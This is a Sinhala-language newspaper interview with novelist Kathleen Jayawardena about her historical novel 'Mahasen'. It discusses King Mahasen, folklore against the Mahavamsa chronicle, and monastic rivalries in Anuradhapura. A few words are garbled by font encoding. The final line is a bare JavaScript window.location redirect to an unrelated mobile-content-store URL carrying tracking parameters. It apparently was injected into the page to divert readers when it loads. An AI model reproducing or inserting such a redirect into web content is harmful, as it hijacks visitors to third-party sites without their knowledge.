රාවය

සෑම නවකතාවකින්ම ඉතිහාසයක් ගොඩනැංවෙනවා – ප‍්‍රවීණ ලේඛිකා කැත්ලීන් ජයවර්ධන

සෑම නවකතාවකින්ම ඉතිහාසයක් ගොඩනැංවෙනවා – ප‍්‍රවීණ ලේඛිකා කැත්ලීන් ජයවර්ධන

සුලෝචන වික‍්‍රමසිංහ

කැත්ලීන් ජයවර්ධන අද්‍යතන සිංහල නවකතාවේ විවිධ ඉසව් නිර්මාණාත්මක ලෙස ස්පර්ශ කරන ප‍්‍රවීණ ලේඛිකාවකි. ‘මහසෙන්’ ඇගේ නවතම නවකතාවයි.

ඔබේ මහසෙන් නවකතාව ඵෙතිහාසික චරිතයක් පාදක කර ගත්තක්. ඉතිහාසයෙන් නවකතාවක් ලියන්න හිතුණේ ඇයි?

ඉතිහාසය අතපෙවිය නොහැකි දුරකින් පවතින්නක් නොවෙයි. වර්තමානය ස්ථානගත ව ඇත්තේ ඊට බොහෝ ඈතින් හා වෙනත් ආකාරයකින් කියා සිතෙන්නේ කාලයේ ගමන ගැන මතක් කර දෙන ඉලක්කම් දිහා බලන කොටයි. ව්‍යවච්ෙඡ්දකයා :්බ්එදපසිඑ* කියන අපුරු කෘතිය ලියූ ෆෙද්රිතෝ අන්දහාසී කියන ලේඛකයා මේ සම්බන්ධයෙන් ඉතා පැහැදිලි විචක්ෂණ අවධාරණයක් එළිදක්වා තිබෙනවා. ”ඔබේ නවකතා ඉතිහාසය සම`ග ෆැන්ටසියක යෙදෙනවා නොවේදැයි” ඇසුවිට ඔහු දුන් පිළිතුර මට ඉතාම සමීප ලෙස දැනෙනවා. ඔහු කියනවා ”තමාගේ හැම නවකතාවක්ම නිරන්තරව සම්බන්ධ වන්නේ ඈත අතීතය නැත්නම් මෑත අතීතය සම`ග” බව. වැඩිදෙනෙක් නොසිතූවිරූ අකාරයට මෙවර සාහිත්‍යය සඳහා පිරිනැමෙන නොබෙල් සම්මානය දිනාගත් පැට්රික් මෝඩියානෝ ‘ස්මෘතියෙහි සාහිත්‍ය ශක්‍යතාවලින් උපරිම ප‍්‍රයෝජනයක් ලබාගෙන ඇති බවයි’ පිළිගැනෙන්නේ. ස්මෘතිය කියන්නෙත් ඉතිහාසයක්. එය මෑත ඉතිහාසය හෝ ඈත ඉතිහාසය විය හැකියි. වර්තමාන සංසිද්ධි අනාවරණය කරන වර්තමානයේ ව්‍යාකූල ලෙස පෙනීයන ඇතැම් දේ නිරුවත් කරන බොහෝ ආලෝක පුංජ ඉතිහාසය පුරාම විසිරී පවතිනවා. අප සියලූදෙනාම දීර්ඝ ඵෙතිහාසික කි‍්‍රයාවලියක නිර්මාණ. ඒ කි‍්‍රයාවලිය තරමක් දුරට හෝ ගවේෂණය නොකර වර්තමානයේ මොනම තත්ත්වයක් වත් නිසියාකාරයෙන් තේරුම් ගන්න බැහැ.

අනුරාධපුර යුගයේ සිදුවීම් වර්තමානයට යා කිරීමට ගත් උත්සාහයේදී මුහුණදුන් අභියෝග මොනවාද?

නිර්මාණකරුවා ගොඩ ගන්න උත්සාහ කරන්නේ ඉතිහාසයේ කැලිකසළ, සුන්බුන් නොවේ. කාලය අතික‍්‍රමණය කරන මනුෂ්‍යත්වය ඓතිහාසික ව විමසා බැලීමටයි, ඔහු එහිදී යොමුවන්නේ. අවුරුදු දෙදාස් පන්සියකට පෙර ජීවත් වූ මිනිසාගේත් තව දෙදාස්පන්සීයකින් පසුව ජීවත්වන මිනිසාගේත් හැ`ගීම්-දැනීම් ආවේග එක සමානයි. ඔහුගේ වෛරය, බලාශාව, විජීගිෂාව, පේ‍්‍රමය, දයාව, කරුණාව කාලයත් සම`ග වෙනස් වී නැහැ. ඒ අනුව බලන විට නම් සියලූම නවකතා අර්ධ වශයෙන් හෝ ‘ඓතිහාසික නවකතා’ යැයි හඳුන්වන්නට බැරි කමක් නෑ.
ඇතැම් විචාරකයන්ගේ අදහස වන්නේ ඓතිහාසික යථාව හා සාහිත්‍යයික යථාව එක හා සමාන නොවන බවයි.

ඓතිහාසික නව කතාවක් තුළ මනුෂ්‍යත්වය විවරණය කිරීම පහසු කාර්යයක් නොවන බවත් සමකාලීන ප‍්‍රශ්න සාකච්ඡුා කිරීමට ඓතිහාසික නවකතාව ඉඩ හසර පාදා නොදෙන බවත් ඇතැම් විචාරකයන් කියා තිබෙනවා. ඒත් මේ ප‍්‍රශ්නයට පිළිතුරු මේ වන විට සම්පාදනය වී හමාර යැයි මට හිතෙනවා. ලියෝ තොල්ස්තෝයිගේ ‘යුද්ධය හා සාමය’, චාල්ස් ඩිකන්ස්ගේ ‘දෙනුවර අන්දරය’ ඇතු`ඵ ලෝක සාහිත්‍යයේ ඓතිහාසික පසුතලයක් ඇති නිර්මාණ, නවකතා සාහිත්‍යයික ගුණයෙන් අඩු යැයි කියන්න පු`ඵවන්ද? හැම ඉතිහාස කතාවකම මතු පිටතලයක් වගේම යටිතලයකුත් පවතිනවා. ලේඛකයා ගොඩගන්නේ ඒ වැල`ඵණු නිධානයයි. හැම නවකතාවකින්ම අර්ධ වශයෙන් හෝ ඓතිහාසික නවකතාවක් ගොඩනැගෙන බව කීම බොහෝ දුරට නිවැරදි වන්නේ ඒ නිසයි.

ඉතිහාසගත පුවතක් තෝරාගැනීමේදී ඔබ මහසෙන් රජු කෙරෙහි වැඩි අවධානයක් යොමු කළේ ඇයි?

වාරිකර්මාන්තයේ දියුණුවට අතහිත දුන් රජෙක් වශයෙන් ඉතිහාස ගතවී ඇතත්, මහසෙන් රජු පිළිබඳව ඉතිහාසඥයන් දීර්ඝ සටහන් තබා නැති බවයි මගේ හැ`ගීම. ඉතිහාසඥයන් වැඩිපුර කතා කර ඇති තව බොහෝ රජුන් සිටිනවා. මහසෙන් රජුගේ ජීවිතය පිළිබඳව මූලාශ‍්‍රයන්හි අඩුවෙන් සඳහන් වන නිසාම මගේ පරිකල්පනයට වැඩි ඉඩක් ලැබුණ බවකුයි හැෙ`ගන්නේ. ඉතිහාසය එසේ උඩින්පල්ලෙන් කතා කරන පුද්ගලයන් පිළිබඳව ගැඹුරින් සොයාබැලිය යුතුව ඇති බවයි මගේ පෞද්ගලික විශ්වාසය. මේ පිළිබඳ අපූරු විග‍්‍රහයක් කරන්නේ ලියෝ තෝල්ස්තෝයි නම් වූ මහා ලේඛකයායි. ඔහු කියන්නේ ඉතිහාසය නිර්මාණය වන්නේ, තමන්ගේ ක‍්‍රියා කාරකම් ලේඛනගත කරන්නට තරම් වැදගත් කමක් නැති සාමාන්‍ය මිනිසුන්ගේ සු`ඵසු`ඵ ක‍්‍රියාකාරකම්වලින් කියලයි.
කොහොම වුණත් මහසෙන් රජු ජීවත් වූයේ රාජ්‍ය සංස්ථාවේ නියමුවා-මිනිසුන් අතරේ ශ්‍රේෂ්ඨයා ‘රජු’ ලෙස පිළිගැණුන යුගයකයි. ජනශ‍්‍රැති, ජනකතා ආශ‍්‍රයෙන් මහසෙන්ගේ චරිතය පරිස්සමින් නිරීක්ෂණය කරන විට පෙනී යන තවත් කරුණක් වන්නේ ඔහුගේ නිර්දය බව, දැඩි බව මෙන් ම ඍජු බවයි. හොඳට හෝ නරකට ඔහු තමා විශ්වාස කළ දේ වෙනුවෙන් අවංකව පෙනී හිටියා. අප ජීවත්වන මේ යුගයේ ක`ඵනික බවට පත්වී ඇත්තේ මේ අවංකභාවයයි. බැලූ බැල්මට කිසියම් ආඥාදායක, නිර්දය ස්වරූපයක් පෙන්නුම් කළත් සියල්ලන් සතුටු කිරීමේ ජනප‍්‍රිය ක‍්‍රමෝපායක් මහසෙන් රජු අත්හදා බැලූවේ නැති බවයි පේන්නේ. ඔහු ආගමික බලාධිකාරය සම`ග සම්මුති ඇති කරගත්තේ නැහැ. ඒත් ඔහු ජනතාවගේ ‘කුසගින්න’ ගැන රටේ ආර්ථික සමෘද්ධිය ගැන වැඩියෙන් සිතූ නරපතියෙක්. ඉතිහාසකරුවා විසින් බොහෝ දුරට නොතකා හරිනු ලැබූවත් සාමාන්‍ය ජනතාව ‘මින්නේරි දෙවියන්’ නමින් ඔහු දේවත්වයට පත් කළා.

ජනශ‍්‍රැති ජනකතා, මිථ්‍යා කතා ලෙස ප‍්‍රකටව ඇති නිසා ඉතිහාසය ඒ ඔස්සේ නිරූපනය කිරීම සත්‍යයෙන් ඈත්වීමක් වන්නේ නැද්ද?

ජනශ‍්‍රැති මිථ්‍යාවක් ලෙස හෝ ලිඛිත ඉතිහාසය සත්‍යයක් ලෙස හෝ ඉරිගසා වෙන් කරන්නට බැහැ. ජනකතා, ජනශ‍්‍රැතිවලත් ඉතිහාසය සැ`ගව පවතිනවා. ඉතිහාසය සැමවිටම සත්‍යය වන්නේත් නැහැ. ඉතිහාසඥයා ඇතැම්විට බලවන්තයාගේ නූලෙන් නැටවෙන රූකඩයක් වන්නටත් බැරි නැහැ. ඉතිහාසකරුවාට නොපෙ නෙන ඉසව්වක් ගැමියා දකින්නට පු`ඵවනි. අනෙක් කරුණ නවකතාවන් කියන්නේ චරිත කතාවක් නෙවෙයි. චරිත විනිවිදින පරිකල්පනයක්.

මහානම හිමියන් ලියූ මහාවංශයට ඌන පූර්ණයක් සපයමින් මහසෙන් චරිතයට සාධාරණයක් ඉෂ්ට කිරීමටද ඔබට අවශ්‍ය වූයේ?

මහනාම හිමියන් විවේචනය කිරීමේ හෝ මහසෙන් රජු උත්කර්ෂයට නැගීමේ අපේක්ෂාවක්් කොහෙත්ම තිබුණේ නෑ. කිසියම් ගවේෂණනාත්මක පරිකල්පනයක් ඔස්සේ ඉතිහාසයේ ප‍්‍රධාන ධාරාවෙන් අතුරු මාවතකට එබී බලද්දී මහනාම හිමියන්ගේ ඉතිහාසය පිළිබද ප‍්‍රශ්නාර්ථයක් මතුවිය හැකි බවත් මට හැ`ගුණා. ඒත් මගේ උත්සාහය වුණේ මහානාම හිමියන්ටවත් වෙනකෙනෙකුටවත් සුදුහුණු ගෑම හෝ වැරදි පැටවීම නොවෙයි. ඉතිහාසයේ නොපෙණුන සැ`ගවුණ ඉම්පෙදෙස් අතපත ගා බැලීමයි මා කළේ. මහසෙන් නවකතාව යෝනිසෝමනසිකාරයෙන් යුතුව කියවන ඕනෑම පාඨකයකුට එය වැටහේවි. මහාවිහාරය, අභයගිරිය යන උභය විහාරවල කි‍්‍රයාපටිපාටින් භික්ෂුන්ගේ කි‍්‍රයාකාරකම් දෙස මධ්‍යස්ථව බලන්නයි මා උත්සාහ කළේ. ථෙරවාදී සම්ප‍්‍රදාය වගේම මහායාන සම්ප‍්‍රදාය තුළත් මට පෙනුණ යහපත් හා අයහපත් ලක්ෂණ වගේම මහසෙන් චරිතයේ යම් යම් දුබලතාත් මේ නවකතාවේ තැනින් තැන ප‍්‍රකාශයට පත්වෙනවා. ඒ හැම දුබලතාවක්ම මනුෂ්‍යත්වයේ ආවේණික ලක්ෂණ වලින්ම පැනනගින්නක් බව පාඨකයාට ඒත්තු ගැන්විය හැකි ක‍්‍රම සහ විධි ගැනයි වැඩියෙන්ම මගේ අවධානය යොමු වුණේ. මහසෙන් රජු ගේ චරිතයට සමාන්තරව මහාවිහාරවාසී භික්ෂුවකගේ චරිතයක් වෙනත් පැත්තකින් වෙනත් ආකාරයකින් නිර්වචනය කරන්න මා උත්සාහ කළා. මර්දනය කරන්නට කරන්නට වර්ධනය වන ක්ලේශ ධර්ම භික්ෂුවකගේ අවසාන අරමුණට බාධා පමුණුවන අන්දම ගැන කියන්නයි මං උත්සහා කළේ.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;